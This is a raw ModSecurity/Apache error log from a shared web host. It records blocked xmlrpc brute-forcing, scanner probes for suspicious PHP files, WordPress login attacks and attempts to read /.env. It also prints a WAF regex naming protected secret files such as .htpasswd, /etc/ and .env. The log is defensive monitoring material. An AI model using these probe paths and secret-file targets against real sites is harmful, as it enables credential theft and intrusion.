[Tue May 26 19:28:48.096068 2026] [security2:error] [pid 49598:tid 49799] [client 91.245.236.124:30071] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnGOzJzkdc0WtdrwtgxwAAAMw"]
[Tue May 26 19:28:48.107650 2026] [security2:error] [pid 49598:tid 49784] [client 20.63.34.22:12112] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/1index.php"] [unique_id "ahWnGOzJzkdc0WtdrwtgyAAAAL0"]
[Tue May 26 19:28:48.107750 2026] [security2:error] [pid 49598:tid 49784] [client 20.63.34.22:12112] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/1index.php"] [unique_id "ahWnGOzJzkdc0WtdrwtgyAAAAL0"]
[Tue May 26 19:28:48.770556 2026] [security2:error] [pid 49598:tid 49764] [client 20.63.34.22:12218] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/wp-su.php"] [unique_id "ahWnGOzJzkdc0Wtdrwtg2QAAAKk"]
[Tue May 26 19:28:48.770681 2026] [security2:error] [pid 49598:tid 49764] [client 20.63.34.22:12218] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/wp-su.php"] [unique_id "ahWnGOzJzkdc0Wtdrwtg2QAAAKk"]
[Tue May 26 19:28:48.869666 2026] [security2:error] [pid 49598:tid 49765] [client 91.245.236.124:12313] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnGOzJzkdc0Wtdrwtg3QAAAKo"]
[Tue May 26 19:28:48.869785 2026] [security2:error] [pid 49598:tid 49765] [client 91.245.236.124:12313] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnGOzJzkdc0Wtdrwtg3QAAAKo"]
[Tue May 26 19:28:49.135151 2026] [security2:error] [pid 49598:tid 49818] [client 20.63.34.22:12176] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/ccou.php"] [unique_id "ahWnGezJzkdc0Wtdrwtg7AAAAN8"]
[Tue May 26 19:28:49.135290 2026] [security2:error] [pid 49598:tid 49818] [client 20.63.34.22:12176] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/ccou.php"] [unique_id "ahWnGezJzkdc0Wtdrwtg7AAAAN8"]
[Tue May 26 19:28:49.650637 2026] [security2:error] [pid 49598:tid 49823] [client 91.245.236.124:29873] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnGezJzkdc0Wtdrwtg_AAAAOQ"]
[Tue May 26 19:28:49.650785 2026] [security2:error] [pid 49598:tid 49823] [client 91.245.236.124:29873] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnGezJzkdc0Wtdrwtg_AAAAOQ"]
[Tue May 26 19:28:49.692787 2026] [security2:error] [pid 49598:tid 49854] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnGezJzkdc0Wtdrwtg8gAAAQM"]
[Tue May 26 19:28:49.758192 2026] [security2:error] [pid 49598:tid 49796] [client 58.216.109.17:24005] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahWnGezJzkdc0Wtdrwtg6wAAAMk"], referer: https://www.cagmedya.com/kayseri-web-tasarim/
[Tue May 26 19:28:49.935844 2026] [security2:error] [pid 49598:tid 49761] [client 20.63.34.22:12244] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/wp-ver.php"] [unique_id "ahWnGezJzkdc0WtdrwthCQAAAKY"]
[Tue May 26 19:28:49.935937 2026] [security2:error] [pid 49598:tid 49761] [client 20.63.34.22:12244] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/wp-ver.php"] [unique_id "ahWnGezJzkdc0WtdrwthCQAAAKY"]
[Tue May 26 19:28:50.549633 2026] [security2:error] [pid 49598:tid 49757] [client 123.30.87.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnGuzJzkdc0WtdrwthDwAAAKI"]
[Tue May 26 19:28:50.841304 2026] [security2:error] [pid 49598:tid 49737] [client 20.63.34.22:12186] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/db.php"] [unique_id "ahWnGuzJzkdc0WtdrwthGgAAAI4"]
[Tue May 26 19:28:50.841421 2026] [security2:error] [pid 49598:tid 49737] [client 20.63.34.22:12186] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/db.php"] [unique_id "ahWnGuzJzkdc0WtdrwthGgAAAI4"]
[Tue May 26 19:28:50.889221 2026] [security2:error] [pid 49598:tid 49831] [client 91.245.236.124:16521] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnGuzJzkdc0WtdrwthEAAAAOw"]
[Tue May 26 19:28:50.889387 2026] [security2:error] [pid 49598:tid 49831] [client 91.245.236.124:16521] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnGuzJzkdc0WtdrwthEAAAAOw"]
[Tue May 26 19:28:51.393776 2026] [security2:error] [pid 49598:tid 49810] [client 20.63.34.22:12204] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/lib.php"] [unique_id "ahWnG-zJzkdc0WtdrwthLAAAANc"]
[Tue May 26 19:28:51.393860 2026] [security2:error] [pid 49598:tid 49810] [client 20.63.34.22:12204] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/lib.php"] [unique_id "ahWnG-zJzkdc0WtdrwthLAAAANc"]
[Tue May 26 19:28:51.670118 2026] [security2:error] [pid 49598:tid 49756] [client 91.245.236.124:31167] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnG-zJzkdc0WtdrwthPQAAAKE"]
[Tue May 26 19:28:51.670240 2026] [security2:error] [pid 49598:tid 49756] [client 91.245.236.124:31167] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnG-zJzkdc0WtdrwthPQAAAKE"]
[Tue May 26 19:28:52.005506 2026] [security2:error] [pid 49598:tid 49834] [client 20.63.34.22:12220] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/sys.php"] [unique_id "ahWnHOzJzkdc0WtdrwthRQAAAO8"]
[Tue May 26 19:28:52.005591 2026] [security2:error] [pid 49598:tid 49834] [client 20.63.34.22:12220] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/sys.php"] [unique_id "ahWnHOzJzkdc0WtdrwthRQAAAO8"]
[Tue May 26 19:28:52.012819 2026] [security2:error] [pid 49598:tid 49731] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnG-zJzkdc0WtdrwthOQAAAIg"]
[Tue May 26 19:28:52.182704 2026] [security2:error] [pid 49598:tid 49682] [remote 209.42.19.17:33498] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.19.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnG-zJzkdc0WtdrwthRAAAzFM"]
[Tue May 26 19:28:52.450960 2026] [security2:error] [pid 49598:tid 49774] [client 91.245.236.124:55139] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnHOzJzkdc0WtdrwthUgAAALM"]
[Tue May 26 19:28:52.451123 2026] [security2:error] [pid 49598:tid 49774] [client 91.245.236.124:55139] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnHOzJzkdc0WtdrwthUgAAALM"]
[Tue May 26 19:28:52.484332 2026] [security2:error] [pid 49598:tid 49736] [client 20.63.34.22:12231] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/lala.php"] [unique_id "ahWnHOzJzkdc0WtdrwthUwAAAI0"]
[Tue May 26 19:28:52.484460 2026] [security2:error] [pid 49598:tid 49736] [client 20.63.34.22:12231] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/lala.php"] [unique_id "ahWnHOzJzkdc0WtdrwthUwAAAI0"]
[Tue May 26 19:28:52.568650 2026] [security2:error] [pid 49598:tid 49805] [client 102.129.255.177:59137] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "208.91.198.65"] [uri "/.env"] [unique_id "ahWnHOzJzkdc0WtdrwthVAAAANI"]
[Tue May 26 19:28:52.689649 2026] [security2:error] [pid 49598:tid 49836] [client 47.91.104.88:41850] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahWnG-zJzkdc0WtdrwthQgAAAPE"], referer: https://www.cagmedya.com/kayseri-web-tasarim/
[Tue May 26 19:28:53.046834 2026] [security2:error] [pid 49598:tid 49852] [client 20.63.34.22:12206] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/bthil.php"] [unique_id "ahWnHezJzkdc0WtdrwthZAAAAQE"]
[Tue May 26 19:28:53.046960 2026] [security2:error] [pid 49598:tid 49852] [client 20.63.34.22:12206] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/bthil.php"] [unique_id "ahWnHezJzkdc0WtdrwthZAAAAQE"]
[Tue May 26 19:28:53.226897 2026] [security2:error] [pid 49598:tid 49847] [client 91.245.236.124:54413] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnHezJzkdc0WtdrwthaAAAAPw"]
[Tue May 26 19:28:53.227051 2026] [security2:error] [pid 49598:tid 49847] [client 91.245.236.124:54413] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnHezJzkdc0WtdrwthaAAAAPw"]
[Tue May 26 19:28:53.433154 2026] [security2:error] [pid 49598:tid 49745] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnHOzJzkdc0WtdrwthYwAAAJY"]
[Tue May 26 19:28:54.014336 2026] [security2:error] [pid 49598:tid 49750] [client 91.245.236.124:57437] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnHuzJzkdc0WtdrwthggAAAJs"]
[Tue May 26 19:28:54.014492 2026] [security2:error] [pid 49598:tid 49750] [client 91.245.236.124:57437] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnHuzJzkdc0WtdrwthggAAAJs"]
[Tue May 26 19:28:54.499886 2026] [security2:error] [pid 49598:tid 49717] [remote 172.104.164.56:55330] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.164.104.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnHuzJzkdc0WtdrwthiQAA5XY"]
[Tue May 26 19:28:54.779647 2026] [security2:error] [pid 49598:tid 49767] [client 91.245.236.124:14969] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnHuzJzkdc0WtdrwthlgAAAKw"]
[Tue May 26 19:28:54.779768 2026] [security2:error] [pid 49598:tid 49767] [client 91.245.236.124:14969] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnHuzJzkdc0WtdrwthlgAAAKw"]
[Tue May 26 19:28:55.556047 2026] [security2:error] [pid 49598:tid 49753] [client 91.245.236.124:35583] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnH-zJzkdc0WtdrwthrAAAAJ4"]
[Tue May 26 19:28:55.556179 2026] [security2:error] [pid 49598:tid 49753] [client 91.245.236.124:35583] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnH-zJzkdc0WtdrwthrAAAAJ4"]
[Tue May 26 19:28:55.863845 2026] [security2:error] [pid 49598:tid 49787] [client 20.63.34.22:12171] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/fun.php"] [unique_id "ahWnH-zJzkdc0WtdrwthsQAAAMA"]
[Tue May 26 19:28:55.864018 2026] [security2:error] [pid 49598:tid 49787] [client 20.63.34.22:12171] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/fun.php"] [unique_id "ahWnH-zJzkdc0WtdrwthsQAAAMA"]
[Tue May 26 19:28:56.263750 2026] [security2:error] [pid 49598:tid 49809] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnH-zJzkdc0WtdrwthsAAAANY"]
[Tue May 26 19:28:56.301292 2026] [security2:error] [pid 49598:tid 49694] [remote 185.190.18.72:46126] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 72.18.190.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-login.php"] [unique_id "ahWnIOzJzkdc0WtdrwthwQAA6l8"], referer: https://avprealty.com/wp-login.php
[Tue May 26 19:28:56.318612 2026] [security2:error] [pid 49598:tid 49798] [client 91.245.236.124:15151] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnIOzJzkdc0WtdrwthwgAAAMs"]
[Tue May 26 19:28:56.318723 2026] [security2:error] [pid 49598:tid 49798] [client 91.245.236.124:15151] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnIOzJzkdc0WtdrwthwgAAAMs"]
[Tue May 26 19:28:56.393710 2026] [core:crit] [pid 49598:tid 49744] (13)Permission denied: [client 157.55.39.10:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 19:28:56.665192 2026] [security2:error] [pid 49598:tid 49830] [client 20.63.34.22:12281] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/wp-the.php"] [unique_id "ahWnIOzJzkdc0WtdrwthzAAAAOs"]
[Tue May 26 19:28:56.665300 2026] [security2:error] [pid 49598:tid 49830] [client 20.63.34.22:12281] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/wp-the.php"] [unique_id "ahWnIOzJzkdc0WtdrwthzAAAAOs"]
[Tue May 26 19:28:57.097898 2026] [security2:error] [pid 49598:tid 49761] [client 91.245.236.124:18481] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnIezJzkdc0Wtdrwth2QAAAKY"]
[Tue May 26 19:28:57.098031 2026] [security2:error] [pid 49598:tid 49761] [client 91.245.236.124:18481] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnIezJzkdc0Wtdrwth2QAAAKY"]
[Tue May 26 19:28:57.860919 2026] [security2:error] [pid 49598:tid 49808] [client 91.245.236.124:12629] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnIezJzkdc0Wtdrwth8gAAANU"]
[Tue May 26 19:28:57.861069 2026] [security2:error] [pid 49598:tid 49808] [client 91.245.236.124:12629] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnIezJzkdc0Wtdrwth8gAAANU"]
[Tue May 26 19:28:57.960994 2026] [security2:error] [pid 49598:tid 49739] [client 176.65.139.239:24034] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "sandbox.dezka.mx"] [uri "/.env"] [unique_id "ahWnIezJzkdc0Wtdrwth9gAAAJA"]
[Tue May 26 19:28:58.454846 2026] [security2:error] [pid 49598:tid 49799] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnIuzJzkdc0Wtdrwth_QAAAMw"]
[Tue May 26 19:28:58.489456 2026] [security2:error] [pid 49598:tid 49758] [client 20.63.34.22:12239] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/vx.php"] [unique_id "ahWnIuzJzkdc0WtdrwtiBQAAAKM"]
[Tue May 26 19:28:58.489563 2026] [security2:error] [pid 49598:tid 49758] [client 20.63.34.22:12239] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/vx.php"] [unique_id "ahWnIuzJzkdc0WtdrwtiBQAAAKM"]
[Tue May 26 19:28:58.627051 2026] [security2:error] [pid 49598:tid 49769] [client 91.245.236.124:65441] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnIuzJzkdc0WtdrwtiCQAAAK4"]
[Tue May 26 19:28:58.627168 2026] [security2:error] [pid 49598:tid 49769] [client 91.245.236.124:65441] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnIuzJzkdc0WtdrwtiCQAAAK4"]
